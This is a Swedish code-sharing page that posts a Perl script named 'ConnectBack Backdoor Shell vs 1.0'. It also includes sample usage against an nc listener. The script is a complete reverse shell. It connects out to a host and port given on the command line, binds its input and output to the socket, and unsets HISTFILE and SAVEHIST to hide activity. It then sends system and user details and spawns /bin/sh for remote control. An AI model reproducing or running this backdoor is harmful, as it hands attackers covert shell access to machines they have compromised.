ConnectBack Backdoor Shell vs 1.0 by Error Code

Skapad 4 år sedan, skriven i Perl, med 2756 visningar.
URL http://kod.perl.se/view/76e28764 Bädda in
Ladda hem koden eller visa koden i råformatVisa bredare version
 1. #!/usr/bin/perl
 2. use IO::Socket;
 3. #Contact: www.facebook.com/pqpigor        
 4. #
 5. #                                          
 6. #
 7. #e.code@SlackwareLinux:/home/programing$ perl dc.pl
 8. #--== ConnectBack Backdoor Shell vs 1.0 by Error Code ==--
 9. #
 10. #Usage: dc.pl [Host] [Port]
 11. #
 12. #Ex: dc.pl 127.0.0.1 2121
 13. #e.code@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
 14. #--== ConnectBack Backdoor Shell vs 1.0 by Error Code ==--
 15. #
 16. #[*] Resolving HostName
 17. #[*] Connecting... 127.0.0.1
 18. #[*] Spawning Shell
 19. #[*] Connected to remote host
 20.  
 21. #bash-2.05b# nc -vv -l -p 2121
 22. #listening on [any] 2121 ...
 23. #connect to [127.0.0.1] from localhost [127.0.0.1] 2121
 24. #--== ConnectBack Backdoor vs 1.0 by Error Code ==--
 25. #
 26. #--==Systeminfo==--
 27. #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
 28. #
 29. #--==Userinfo==--
 30. #uid=1001(error) gid=100(error) groups=100(error)
 31. #
 32. #--==Directory==--
 33. #/root
 34. #
 35. #--==Shell==--
 36. #
 37. $system = '/bin/sh';
 38. $ARGC=@ARGV;
 39. print "--== ConnectBack Backdoor Shell vs 1.0 Error Code  ==-- \n\n";
 40. if ($ARGC!=2) {
 41.    print "Usage: $0 [Host] [Port] \n\n";
 42.    die "Ex: $0 127.0.0.1 2121 \n";
 43. }
 44. use Socket;
 45. use FileHandle;
 46. socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
 47. connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
 48. print "[*] Resolving HostName\n";
 49. print "[*] Connecting... $ARGV[0] \n";
 50. print "[*] Spawning Shell \n";
 51. print "[*] Connected to remote host \n";
 52. SOCKET->autoflush();
 53. open(STDIN, ">&SOCKET");
 54. open(STDOUT,">&SOCKET");
 55. open(STDERR,">&SOCKET");
 56. print "--== ConnectBack Backdoor vs 1.0 by Error Code ==--  \n\n";
 57. system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
 58. echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
 59. system($system);
 60. #EOF

Svara på "ConnectBack Backdoor Shell vs 1.0 by Error Code"

Här kan du skriva ett svar till kodsnutten ovan